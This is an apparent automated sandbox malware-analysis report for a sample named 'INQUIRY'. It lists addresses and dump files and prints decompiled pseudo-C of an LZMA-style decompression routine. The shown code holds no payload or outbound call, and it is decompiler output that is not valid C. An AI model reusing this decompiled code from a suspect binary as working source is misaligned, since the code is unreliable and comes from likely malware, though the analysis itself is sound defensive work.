0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00406734
0x004066bb
0x004066b8
0x00000000
0x004062ef

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406409 Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406409() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
